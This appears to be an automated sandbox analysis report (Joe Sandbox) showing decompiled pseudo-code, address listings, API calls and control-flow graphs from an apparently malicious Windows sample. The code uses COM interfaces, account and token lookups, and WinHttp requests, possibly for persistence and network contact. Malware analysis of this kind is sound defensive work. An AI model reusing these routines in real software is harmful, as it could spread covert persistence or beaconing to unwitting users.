				intOrPtr* _t280;
				intOrPtr* _t281;
				void* _t283;
				intOrPtr* _t284;
				intOrPtr _t292;
				void* _t329;
				void* _t333;
				intOrPtr* _t334;
				void* _t338;
				void* _t342;
				void* _t344;
				void* _t345;

				_t349 =  *((intOrPtr*)(__ecx + 4));
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_t334 = __ecx;
					_v8 = 0;
					_v16 = 0;
					_v20 = 0;
					_v24 = 0;
					_v12 = 0;
					_t284 = 0;
					_v28 = 0;
					E00399090(_t349,  &_v280, 0x24);
					_t239 =  *_t334;
					_t344 = _t342 - 0x114 + 8;
					_t241 =  *((intOrPtr*)( *((intOrPtr*)( *_t239 + 0x20))))(_t239,  &_v280, 0x3b613c, 0x3b611c,  &_v8, _t329, _t333, _t283, _t338);
					if(_t241 >= 0) {
						E00398030( &_v12);
						_t345 = _t344 + 4;
						__eflags = _v12;
						if(_v12 != 0) {
							_v28 = 0x101;
							_t284 = E003A1D90(0x202, 0);
							_t345 = _t345 + 8;
							__eflags = _t284;
							if(_t284 != 0) {
								_t292 =  *0x3b8628; // 0x593938
								 *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x138))))(_t284,  &_v28);
								_t256 = _v8;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t256 + 0x80))))(_t256, _v12);
								if(__eflags >= 0) {
									E00399090(__eflags,  &_v280, 0x14);
									_t260 = _v8;
									_t345 = _t345 + 8;
									_t261 =  *((intOrPtr*)( *((intOrPtr*)( *_t260 + 0x50))))(_t260,  &_v280);
									__eflags = _t261;
									if(_t261 >= 0) {
										_t262 = _v8;
										_t264 =  *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0xc))))(_t262,  &_v32,  &_v20);
										__eflags = _t264;
										if(_t264 >= 0) {
											memset( &_v80, 0, 0x30);
											_v80 = 0x30;
											_v76 = 0x7e1;
											_v72 = 1;
											_v44 = 1;
											_t268 = _v20;
											_t345 = _t345 + 0xc;
											_v74 = 1;
											_v60 = 0x5a0;
											_v56 = 1;
											_v48 = 1;
											_t270 =  *((intOrPtr*)( *((intOrPtr*)( *_t268 + 0xc))))(_t268,  &_v80);
											__eflags = _t270;
											if(_t270 >= 0) {
												_t271 = _v8;
												_t272 =  *((intOrPtr*)( *((intOrPtr*)( *_t271 + 0x78))))(_t271, 0x3b32c0, 0);
												__eflags = _t272 - 0x80070005;
												if(_t272 == 0x80070005) {
													_t281 = _v8;
													_t272 =  *((intOrPtr*)( *((intOrPtr*)( *_t281 + 0x78))))(_t281, _t284, 0);
												}
												__eflags = _t272;
												if(_t272 >= 0) {
													_t273 = _v8;
													_t275 =  *((intOrPtr*)( *((intOrPtr*)( *_t273))))(_t273, 0x3b60a0,  &_v16);
													__eflags = _t275;
													if(_t275 >= 0) {
														_t276 = _v16;
														_t277 =  *((intOrPtr*)( *((intOrPtr*)( *_t276 + 0x18))))(_t276, 0, 1);
														__eflags = _t277 - 0x80070005;
														if(_t277 == 0x80070005) {
															_t278 = _v8;
															 *((intOrPtr*)( *((intOrPtr*)( *_t278 + 0x78))))(_t278, _t284, 0);
															_t280 = _v16;
															_t277 =  *((intOrPtr*)( *((intOrPtr*)( *_t280 + 0x18))))(_t280, 0, 1);
														}
														__eflags = _t277;
														if(_t277 >= 0) {
															_v24 = 1;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						_t243 = _v20;
						__eflags = _t243;
						if(_t243 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 8))))(_t243);
						}
						_t244 = _v8;
						__eflags = _t244;
						if(_t244 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t244 + 8))))(_t244);
						}
						_t245 = _v16;
						__eflags = _t245;
						if(_t245 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t245 + 8))))(_t245);
						}
						_t246 = _v12;
						__eflags = _t246;
						if(_t246 != 0) {
							E0039BB40(_t246);
							_t345 = _t345 + 4;
						}
						__eflags = _t284;
						if(_t284 != 0) {
							E0039BB40(_t284);
						}
						return _v24;
					} else {
						return 0 | _t241 == 0x80070050;
					}
				} else {
					__ebp = __esp;
					__esp = __esp - 0x214;
					__eax = 0;
					_v20 = 0;
					_v48 = 0;
					_v34 = 0;
					_v30 = 0;
					_v26 = 0;
					__esi = _v28;
					_v52 = 0;
					_v22 = __ax;
					__edi = _v24;
					_v8 = __ecx;
					__ebx =  *__ecx;
					_v16 = 0;
					__esp = __esp - 0x10;
					__eax = __esp;
					__edx = 0;
					_v36 = __dx;
					__ecx = _v36;
					__edx = _v32;
					 *__eax = __ecx;
					 *((intOrPtr*)(__eax + 4)) = __edx;
					 *((intOrPtr*)(__eax + 8)) = __esi;
					 *((intOrPtr*)(__eax + 0xc)) = __edi;
					__esp = __esp - 0x10;
					__eax = __esp;
					 *__eax = __ecx;
					 *((intOrPtr*)(__eax + 4)) = __edx;
					 *((intOrPtr*)(__eax + 8)) = __esi;
					 *((intOrPtr*)(__eax + 0xc)) = __edi;
					__esp = __esp - 0x10;
					__eax = __esp;
					 *__eax = __ecx;
					 *((intOrPtr*)(__eax + 4)) = __edx;
					 *((intOrPtr*)(__eax + 8)) = __esi;
					 *((intOrPtr*)(__eax + 0xc)) = __edi;
					__esp = __esp - 0x10;
					__eax = __esp;
					 *__eax = __ecx;
					 *((intOrPtr*)(__eax + 4)) = __edx;
					 *((intOrPtr*)(__eax + 8)) = __esi;
					__esi = _v8;
					 *((intOrPtr*)(__eax + 0xc)) = __edi;
					_t91 = __esi + 4; // 0xe8fc4d8d
					__eax =  *_t91;
					__eax =  *((intOrPtr*)(__ebx + 0x28));
					_v44 = 1;
					__eax =  *( *((intOrPtr*)(__ebx + 0x28)))( *_t91, __edi, __esi, __ebx, __ebp); // executed
					__eflags = __eax;
					if(__eax >= 0) {
						_t94 = __esi + 4; // 0xe8fc4d8d
						__eax =  *_t94;
						__ecx =  *__eax;
						__edx =  &_v20;
						__eax =  *((intOrPtr*)(__ecx + 0x1c));
						__eax =  *( *((intOrPtr*)(__ecx + 0x1c)))(__eax, 0,  &_v20);
						__eflags = __eax;
						if(__eax >= 0) {
							__ecx =  &_v52;
							__eax = E00398030( &_v52);
							__edx = _v52;
							_v20 = E003932C0(_v20, _v52); // executed
							__eflags =  *0x3b8580;
							if(__eflags == 0) {
								__edx =  &_v16;
								__eax = E00395BD0( &_v16, 1); // executed
								__eflags = __eax;
								if(__eflags != 0) {
									 &_v536 = E00399090(__eflags,  &_v536, 0x15);
									__ecx =  &_v336;
									__eax = E00399090(__eflags,  &_v336, 0x24);
									__edi = __imp__#8;
									__edx =  &_v104;
									 *__edi( &_v104) = _v96;
									__ecx = _v92;
									__esi = _v104;
									__ebx = _v100;
									__edx =  &_v88;
									_v112 = _v96;
									_v108 = _v92;
									__eax =  *__edi( &_v88);
									__ecx = _v84;
									__eax = _v88;
									__edx = _v80;
									_v32 = _v84;
									__ecx =  &_v536;
									_v36 = _v88;
									__eax = _v76;
									__ecx =  &_v136;
									_v28 = _v80;
									_v24 = _v76;
									__eax = E003B0290( &_v136,  &_v536);
									__ecx =  *((intOrPtr*)(__eax + 4));
									__edx =  *__eax;
									_v68 =  *((intOrPtr*)(__eax + 4));
									__ecx = _v16;
									_v72 =  *__eax;
									__edx =  *((intOrPtr*)(__eax + 8));
									__eax =  *((intOrPtr*)(__eax + 0xc));
									__ecx =  &_v40;
									_v64 = __edx;
									_v60 = __eax;
									__eax = E003913C0(__eax,  &_v40, __edi, _v16);
									__eax =  *__eax;
									__eflags = __eax;
									if(__eax == 0) {
										_v12 = 0;
									} else {
										__edx =  *__eax;
										_v12 =  *__eax;
									}
									__eax =  &_v336;
									__ecx =  &_v56;
									__eax = E003913C0( &_v336,  &_v56, __edi,  &_v336);
									__eax =  *__eax;
									__eflags = __eax;
									if(__eax == 0) {
										_v8 = 0;
									} else {
										__ecx =  *__eax;
										_v8 =  *__eax;
									}
									__eax =  &_v48;
									__esp = __esp - 0x10;
									__eax = __esp;
									 *__eax = __esi;
									__esi = _v112;
									 *((intOrPtr*)(__eax + 4)) = __ebx;
									 *((intOrPtr*)(__eax + 8)) = _v112;
									__esi = _v108;
									 *((intOrPtr*)(__eax + 0xc)) = _v108;
									__esi = _v36;
									__esp = __esp - 0x10;
									__eax = __esp;
									 *__eax = _v36;
									__esi = _v32;
									 *((intOrPtr*)(__eax + 4)) = _v32;
									__esi = _v28;
									__ecx = _v20;
									 *((intOrPtr*)(__eax + 8)) = _v28;
									__esi = _v24;
									__edx =  *__ecx;
									 *((intOrPtr*)(__eax + 0xc)) = _v24;
									__esi = _v72;
									__esp = __esp - 0x10;
									__eax = __esp;
									 *__eax = _v72;
									__esi = _v68;
									 *((intOrPtr*)(__eax + 4)) = _v68;
									__esi = _v64;
									 *((intOrPtr*)(__eax + 8)) = _v64;
									__esi = _v60;
									 *((intOrPtr*)(__eax + 0xc)) = _v60;
									__eax = _v12;
									__eax = _v8;
									__ecx =  *((intOrPtr*)(__edx + 0x40));
									__eax =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0x40))))(__ecx, _v8, _v12, 6, 5,  &_v48);
									__ecx =  &_v56;
									__ebx = _v8;
									__eax = E00397CF0( &_v56);
									__ecx =  &_v40;
									__eax = E00397CF0( &_v40);
									__esi = __imp__#9;
									__edx =  &_v136;
									 *__esi( &_v136) =  &_v88;
									__eax =  *__esi( &_v88);
									__ecx =  &_v104;
									__eax =  *__esi( &_v104);
									__eflags = __ebx;
									if(__ebx >= 0) {
										__eax = E00396D30(); // executed
										__eflags = __eax;
										if(__eax == 0) {
											_v44 = __eax;
										}
									} else {
										__eflags = __ebx - 0x80070005;
										if(__ebx == 0x80070005) {
											__edx =  &_v16;
											__eflags = E00395BD0( &_v16, 0);
											if(__eflags != 0) {
												 &_v336 = E00399090(__eflags,  &_v336, 0x24);
												__ecx =  &_v120;
												__eax =  *__edi( &_v120);
												__edx = _v116;
												__eax = _v112;
												__ecx = _v108;
												__ebx = _v120;
												_v100 = _v116;
												__edx =  &_v136;
												_v96 = _v112;
												_v92 = _v108;
												__eax =  *__edi( &_v136);
												__ecx = _v132;
												__eax = _v136;
												__edx = _v128;
												_v68 = _v132;
												_v72 = _v136;
												__eax = _v124;
												__ecx =  &_v36;
												_v64 = _v128;
												_v60 = _v124;
												__eax =  *__edi( &_v36);
												__edx = _v32;
												__ecx = _v24;
												__eax = _v28;
												__edi = _v36;
												_v84 = _v32;
												__edx = _v16;
												_v76 = _v24;
												__ecx =  &_v56;
												_v80 = __eax;
												__eax = E003913C0(__eax,  &_v56, __edi, _v16);
												__eax =  *__eax;
												__eflags = __eax;
												if(__eax == 0) {
													_v8 = 0;
												} else {
													__eax =  *__eax;
													_v8 = __eax;
												}
												__ecx =  &_v336;
												__ecx =  &_v40;
												__eax = E003913C0(__eax,  &_v40, __edi,  &_v336);
												__eax =  *__eax;
												__eflags = __eax;
												if(__eax == 0) {
													_v12 = 0;
												} else {
													__edx =  *__eax;
													_v12 =  *__eax;
												}
												__eax =  &_v48;
												__esp = __esp - 0x10;
												__eax = __esp;
												 *__eax = __ebx;
												__ebx = _v100;
												 *((intOrPtr*)(__eax + 4)) = _v100;
												__ebx = _v96;
												 *((intOrPtr*)(__eax + 8)) = _v96;
												__ebx = _v92;
												 *((intOrPtr*)(__eax + 0xc)) = _v92;
												__ebx = _v72;
												__esp = __esp - 0x10;
												__eax = __esp;
												 *__eax = _v72;
												__ebx = _v68;
												__ecx = _v20;
												 *((intOrPtr*)(__eax + 4)) = _v68;
												__ebx = _v64;
												__edx =  *__ecx;
												 *((intOrPtr*)(__eax + 8)) = _v64;
												__ebx = _v60;
												 *((intOrPtr*)(__eax + 0xc)) = _v60;
												__esp = __esp - 0x10;
												__eax = __esp;
												 *__eax = __edi;
												__edi = _v84;
												 *((intOrPtr*)(__eax + 4)) = _v84;
												__edi = _v80;
												 *((intOrPtr*)(__eax + 8)) = _v80;
												__edi = _v76;
												 *((intOrPtr*)(__eax + 0xc)) = _v76;
												__eax = _v8;
												__eax = _v12;
												__ecx =  *((intOrPtr*)(__edx + 0x40));
												__eax =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0x40))))(__ecx, _v12, _v8, 6, 3,  &_v48);
												__ecx =  &_v40;
												__eax = E00397CF0( &_v40);
												__ecx =  &_v56;
												__eax = E00397CF0( &_v56);
												__edx =  &_v36;
												 *__esi( &_v36) =  &_v136;
												__eax =  *__esi( &_v136);
												__ecx =  &_v120;
												__eax =  *__esi( &_v120);
											}
										}
									}
								}
							} else {
								__ecx = _v52;
								__ecx = __esi;
								__eax = E003B0580(__esi, __eflags, _v52);
							}
						}
					}
					__eax = _v48;
					__eflags = __eax;
					if(__eax != 0) {
						__edx =  *__eax;
						 *((intOrPtr*)(__edx + 8)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))))(__eax);
					}
					__eax = _v20;
					__eflags = __eax;
					if(__eax != 0) {
						__ecx =  *__eax;
						__edx =  *((intOrPtr*)(__ecx + 8));
						__eax =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 8))))(__eax);
					}
					__eax = _v16;
					__eflags = __eax;
					if(__eax != 0) {
						__eax = E0039BB40(__eax);
					}
					__eax = _v44;
					_pop(__edi);
					_pop(__esi);
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return _v44;
				}
			}
















































































    0x00393d50
    0x00393d54
    0x00391457
    0x00391459
    0x0039145c
    0x0039145f
    0x00391462
    0x00391465
    0x00391468
    0x0039146a
    0x0039146d
    0x00391472
    0x00391476
    0x00391492
    0x00391496
    0x003914af
    0x003914b4
    0x003914b7
    0x003914ba
    0x003914c6
    0x003914d2
    0x003914d4
    0x003914d7
    0x003914d9
    0x003914df
    0x003914f0
    0x003914f2
    0x00391504
    0x00391506
    0x00391515
    0x0039151a
    0x00391522
    0x0039152d
    0x0039152f
    0x00391531
    0x00391537
    0x00391548
    0x0039154a
    0x0039154c
    0x00391559
    0x00391568
    0x00391571
    0x00391577
    0x0039157d
    0x00391581
    0x00391584
    0x0039158c
    0x00391590
    0x00391597
    0x0039159a
    0x003915a4
    0x003915a6
    0x003915a8
    0x003915aa
    0x003915b9
    0x003915bb
    0x003915c0
    0x003915c2
    0x003915cd
    0x003915cd
    0x003915cf
    0x003915d1
    0x003915d3
    0x003915e4
    0x003915e6
    0x003915e8
    0x003915ea
    0x003915f5
    0x003915f7
    0x003915fc
    0x003915fe
    0x00391609
    0x0039160b
    0x00391616
    0x00391616
    0x00391618
    0x0039161a
    0x0039161c
    0x0039161c
    0x0039161a
    0x003915e8
    0x003915d1
    0x003915a8
    0x0039154c
    0x00391531
    0x00391506
    0x003914d9
    0x0039161f
    0x00391622
    0x00391624
    0x0039162c
    0x0039162c
    0x0039162e
    0x00391631
    0x00391633
    0x0039163b
    0x0039163b
    0x0039163d
    0x00391640
    0x00391642
    0x0039164a
    0x0039164a
    0x0039164c
    0x0039164f
    0x00391651
    0x00391654
    0x00391659
    0x00391659
    0x0039165c
    0x0039165e
    0x00391661
    0x00391666
    0x00391672
    0x00391498
    0x003914aa
    0x003914aa
    0x00393d56
    0x003961e1
    0x003961e3
    0x003961e9
    0x003961ee
    0x003961f1
    0x003961f4
    0x003961f7
    0x003961fa
    0x003961fd
    0x00396200
    0x00396203
    0x00396207
    0x0039620a
    0x00396210
    0x00396212
    0x00396215
    0x00396218
    0x0039621a
    0x0039621c
    0x00396220
    0x00396223
    0x00396226
    0x00396228
    0x0039622b
    0x0039622e
    0x00396231
    0x00396234
    0x00396236
    0x00396238
    0x0039623b
    0x0039623e
    0x00396241
    0x00396244
    0x00396246
    0x00396248
    0x0039624b
    0x0039624e
    0x00396251
    0x00396254
    0x00396256
    0x00396258
    0x0039625b
    0x0039625e
    0x00396261
    0x00396264
    0x00396264
    0x00396268
    0x0039626b
    0x00396272
    0x00396274
    0x00396276
    0x0039627c
    0x0039627c
    0x0039627f
    0x00396281
    0x00396288
    0x0039628b
    0x0039628d
    0x0039628f
    0x00396295
    0x00396299
    0x0039629e
    0x003962a6
    0x003962ae
    0x003962b5
    0x003962c7
    0x003962cd
    0x003962d5
    0x003962d7
    0x003962e6
    0x003962eb
    0x003962f4
    0x003962f9
    0x00396302
    0x00396308
    0x0039630b
    0x0039630e
    0x00396311
    0x00396314
    0x00396318
    0x0039631b
    0x0039631e
    0x00396320
    0x00396323
    0x00396326
    0x00396329
    0x0039632c
    0x00396332
    0x00396335
    0x00396339
    0x0039633f
    0x00396342
    0x00396345
    0x0039634a
    0x0039634d
    0x0039634f
    0x00396352
    0x00396355
    0x00396358
    0x0039635b
    0x0039635f
    0x00396362
    0x00396365
    0x00396368
    0x0039636d
    0x0039636f
    0x00396371
    0x0039637a
    0x00396373
    0x00396373
    0x00396375
    0x00396375
    0x00396381
    0x00396388
    0x0039638b
    0x00396390
    0x00396392
    0x00396394
    0x0039639d
    0x00396396
    0x00396396
    0x00396398
    0x00396398
    0x003963a4
    0x003963a8
    0x003963ab
    0x003963ad
    0x003963af
    0x003963b2
    0x003963b5
    0x003963b8
    0x003963bb
    0x003963be
    0x003963c3
    0x003963c6
    0x003963c8
    0x003963ca
    0x003963cd
    0x003963d0
    0x003963d3
    0x003963d6
    0x003963d9
    0x003963dc
    0x003963de
    0x003963e1
    0x003963e4
    0x003963e7
    0x003963e9
    0x003963eb
    0x003963ee
    0x003963f1
    0x003963f4
    0x003963f7
    0x003963fa
    0x003963fd
    0x00396403
    0x00396408
    0x0039640b
    0x0039640d
    0x00396410
    0x00396412
    0x00396417
    0x0039641a
    0x0039641f
    0x00396425
    0x0039642e
    0x00396432
    0x00396434
    0x00396438
    0x0039643a
    0x0039643c
    0x003965a2
    0x003965a7
    0x003965a9
    0x003965ab
    0x003965ab
    0x00396442
    0x00396442
    0x00396448
    0x0039644e
    0x0039645c
    0x0039645e
    0x0039646d
    0x00396475
    0x00396479
    0x0039647b
    0x0039647e
    0x00396481
    0x00396484
    0x00396487
    0x0039648a
    0x00396491
    0x00396494
    0x00396497
    0x00396499
    0x0039649c
    0x003964a2
    0x003964a5
    0x003964a8
    0x003964ab
    0x003964ae
    0x003964b2
    0x003964b5
    0x003964b8
    0x003964ba
    0x003964bd
    0x003964c0
    0x003964c3
    0x003964c6
    0x003964c9
    0x003964cc
    0x003964d0
    0x003964d3
    0x003964d6
    0x003964db
    0x003964dd
    0x003964df
    0x003964e8
    0x003964e1
    0x003964e1
    0x003964e3
    0x003964e3
    0x003964ef
    0x003964f6
    0x003964f9
    0x003964fe
    0x00396500
    0x00396502
    0x0039650b
    0x00396504
    0x00396504
    0x00396506
    0x00396506
    0x00396512
    0x00396516
    0x00396519
    0x0039651b
    0x0039651d
    0x00396520
    0x00396523
    0x00396526
    0x00396529
    0x0039652c
    0x0039652f
    0x00396534
    0x00396537
    0x00396539
    0x0039653b
    0x0039653e
    0x00396541
    0x00396544
    0x00396547
    0x00396549
    0x0039654c
    0x0039654f
    0x00396552
    0x00396555
    0x00396557
    0x00396559
    0x0039655c
    0x0039655f
    0x00396562
    0x00396565
    0x00396568
    0x0039656b
    0x00396571
    0x00396576
    0x00396579
    0x0039657b
    0x0039657e
    0x00396583
    0x00396586
    0x0039658b
    0x00396591
    0x00396598
    0x0039659a
    0x0039659e
    0x0039659e
    0x0039645e
    0x00396448
    0x0039643c
    0x003962b7
    0x003962b7
    0x003962bb
    0x003962bd
    0x003962bd
    0x003962b5
    0x0039628f
    0x003965ae
    0x003965b1
    0x003965b3
    0x003965b5
    0x003965bb
    0x003965bb
    0x003965bd
    0x003965c0
    0x003965c2
    0x003965c4
    0x003965c6
    0x003965ca
    0x003965ca
    0x003965cc
    0x003965cf
    0x003965d1
    0x003965d4
    0x003965d9
    0x003965dc
    0x003965df
    0x003965e0
    0x003965e1
    0x003965e2
    0x003965e4
    0x003965e5
    0x003965e5

    APIs
      • Part of subcall function 00395BD0: LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 00395C5B
      • Part of subcall function 00395BD0: memcpy.MSVCRT ref: 00395D01
      • Part of subcall function 00395BD0: memcpy.MSVCRT ref: 00395D26
      • Part of subcall function 00395BD0: _time64.MSVCRT ref: 00395DCC
      • Part of subcall function 00395BD0: _localtime64.MSVCRT ref: 00395DDD
      • Part of subcall function 00395BD0: wcsftime.MSVCRT ref: 00395E07
    • VariantInit.OLEAUT32(?), ref: 00396306
    • VariantInit.OLEAUT32(?), ref: 0039631E
      • Part of subcall function 003B0290: SysAllocString.OLEAUT32(Jc9), ref: 003B02A3
      • Part of subcall function 003913C0: ??2@YAPAXI@Z.MSVCRT ref: 003913C9
      • Part of subcall function 003913C0: SysAllocString.OLEAUT32(75CF3F3F), ref: 003913EA
      • Part of subcall function 00397CF0: InterlockedDecrement.KERNEL32(?), ref: 00397CFE
      • Part of subcall function 00397CF0: SysFreeString.OLEAUT32(00000000), ref: 00397D13
      • Part of subcall function 00397CF0: ??_V@YAXPAX@Z.MSVCRT ref: 00397D21
      • Part of subcall function 00397CF0: ??3@YAXPAX@Z.MSVCRT ref: 00397D2A
    • VariantClear.OLEAUT32(?), ref: 0039642C
    • VariantClear.OLEAUT32(?), ref: 00396432
    • VariantClear.OLEAUT32(?), ref: 00396438
    • VariantInit.OLEAUT32(?), ref: 00396479
    • VariantInit.OLEAUT32(?), ref: 00396497
    • VariantInit.OLEAUT32(?), ref: 003964B8
    • VariantClear.OLEAUT32(?), ref: 0039658F
    • VariantClear.OLEAUT32(?), ref: 00396598
    • VariantClear.OLEAUT32(?), ref: 0039659E
      • Part of subcall function 00396D30: GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 00396D8D
      • Part of subcall function 003B0580: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000001,?,?,80000001,?,003962C2,?,?,?,?,0039FD54), ref: 003B05FF
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003932C0: VariantClear.OLEAUT32(?), ref: 00393352
      • Part of subcall function 003932C0: SysFreeString.OLEAUT32(003962AB), ref: 0039337C
      • Part of subcall function 003932C0: SysFreeString.OLEAUT32(?), ref: 003933F6
      • Part of subcall function 003932C0: VariantClear.OLEAUT32(?), ref: 00393495
      • Part of subcall function 003932C0: SysFreeString.OLEAUT32(?), ref: 003934BB
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B13D0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117time

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 282 3b13d0-3b13f2 284 3b14aa-3b14af 282->284 285 3b13f8-3b13fd 282->285 286 3b14b8-3b14c7 284->286 287 3b14b1-3b14b2 WinHttpCloseHandle 284->287 288 3b1409-3b1463 WinHttpSetTimeouts call 399090 WinHttpOpenRequest 285->288 289 3b13ff-3b1406 WinHttpCloseHandle 285->289 287->286 288->284 292 3b1465-3b1468 288->292 289->288 293 3b146a-3b1482 WinHttpSetOption 292->293 294 3b1484-3b1496 WinHttpSendRequest 292->294 293->284 293->294 295 3b14ca-3b14d7 WinHttpReceiveResponse 294->295 296 3b1498-3b14a3 294->296 295->284 297 3b14d9-3b14f4 WinHttpQueryHeaders 295->297 296->284 297->284 298 3b14f6-3b1508 297->298
    APIs
    • WinHttpCloseHandle.WINHTTP(?), ref: 003B1400
    • WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,0002BF20,000927C0), ref: 003B1421
    • WinHttpOpenRequest.WINHTTP(?,?,00000004,00000000,00000000,00000000,?), ref: 003B1458
    • WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 003B147A
    • WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003B148E
    • WinHttpCloseHandle.WINHTTP(?), ref: 003B14B2
    • WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 003B14CF
    • WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 003B14EC
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00395BD0, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 313

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 299 395bd0-395c05 300 395c68-395c8c 299->300 301 395c07-395c2a 299->301 305 395ef2-395ef7 300->305 310 395c92-395cb5 300->310 304 395c30-395c3f 301->304 301->305 309 395c42-395c5f LookupAccountSidW 304->309 307 395ef9-395eff call 39bb40 305->307 308 395f02-395f07 305->308 307->308 312 395f09-395f0f 308->312 313 395f17-395f1c 308->313 314 395c61-395c67 309->314 315 395cd5-395cda 309->315 310->305 325 395cbb-395cd0 310->325 312->313 319 395f2d-395f35 313->319 320 395f1e-395f25 313->320 317 395cdc-395ce1 315->317 318 395d37-395d3a 315->318 317->318 322 395ce3-395d33 call 3a1d90 memcpy * 2 317->322 323 395d3c-395d3e 318->323 324 395d40 318->324 320->319 322->318 327 395d42-395d79 call 391c70 call 3a1d90 call 399090 * 2 323->327 324->327 325->309 337 395d7b-395d91 call 399090 327->337 338 395daf-395df2 call 399090 * 2 _time64 _localtime64 call 399090 327->338 344 395d93-395da2 337->344 345 395da4-395dac call 399090 337->345 350 395df7-395e1e wcsftime 338->350 344->344 344->345 345->338 351 395e20 350->351 352 395e34-395e4d call 399090 350->352 353 395e23-395e32 351->353 356 395e4f 352->356 357 395e61-395e65 352->357 353->352 353->353 358 395e50-395e5f 356->358 359 395e9f-395ebf call 399090 call 398030 357->359 360 395e67-395e7d call 399090 357->360 358->357 358->358 372 395ec1-395ed0 359->372 373 395ed2-395ef0 call 399090 call 39bb40 359->373 365 395e7f 360->365 366 395e91-395e9c call 399090 360->366 368 395e80-395e8f 365->368 366->359 368->366 368->368 372->372 372->373 373->305
    C-Code - Quality: 69%
    			E00395BD0(intOrPtr* _a4, signed int _a8) {
				long _v8;
				signed int _v12;
				short _v16;
				char _v20;
				void* _v24;
				signed short* _v28;
				char _v32;
				signed short* _v36;
				char _v44;
				tm* _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				void* _v120;
				void* _v196;
				void _v708;
				void _v1220;
				long _v1732;
				intOrPtr _t98;
				signed int _t99;
				signed short* _t100;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t106;
				signed int _t111;
				void* _t113;
				int _t114;
				intOrPtr _t116;
				signed int _t117;
				signed int _t120;
				tm* _t121;
				signed short _t125;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				void* _t154;
				intOrPtr _t155;
				long _t162;
				signed short* _t165;
				signed short* _t166;
				void* _t168;
				void* _t169;
				intOrPtr _t177;
				intOrPtr _t179;
				intOrPtr _t190;
				WCHAR* _t192;
				wchar_t* _t193;
				signed short* _t194;
				void* _t195;
				intOrPtr _t196;
				void* _t197;
				void* _t198;
				void* _t199;
				signed int* _t200;
				signed int* _t201;
				signed int* _t202;
				signed int* _t203;
				signed int* _t204;
				short* _t205;
				void* _t206;
				void* _t207;
				void* _t208;
				void* _t211;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;

				_t192 = 0;
				_t195 = 0;
				_t154 = 0;
				_v32 = 0;
				_v60 = 0;
				_v20 = 0;
				_v16 = 0x500;
				_v24 = 0;
				_v28 = 0;
				_v8 = 0x200;
				_v12 = 0x200;
				if(_a8 == 0) {
					_t155 =  *0x3b8628; // 0x593938
					_t98 =  *0x3b8628; // 0x593938
					_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x150))))( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x100))))(8,  &_v32));
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					} else {
						_t179 =  *0x3b8628; // 0x593938
						_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t179 + 0x13c))))(_v32, 1,  &_v196, 0x4c,  &_v60);
						__eflags = _t111;
						if(_t111 == 0) {
							goto L32;
						} else {
							_push( &_v52);
							_push( &_v12);
							_push( &_v708);
							_t113 = _v196;
							goto L3;
						}
					}
				} else {
					_t190 =  *0x3b8628; // 0x593938
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x12);
					_push(1);
					_push( &_v20);
					if( *((intOrPtr*)( *((intOrPtr*)(_t190 + 0x158))))() == 0) {
						L32:
						_t100 = _v28;
						__eflags = _t100 - _t192;
						if(_t100 != _t192) {
							E0039BB40(_t100);
						}
						_t101 = _v24;
						__eflags = _t101 - _t192;
						if(_t101 != _t192) {
							_t106 =  *0x3b8628; // 0x593938
							 *((intOrPtr*)( *((intOrPtr*)(_t106 + 0x154))))(_t101);
						}
						_t102 = _v32;
						__eflags = _t102 - _t192;
						if(_t102 != _t192) {
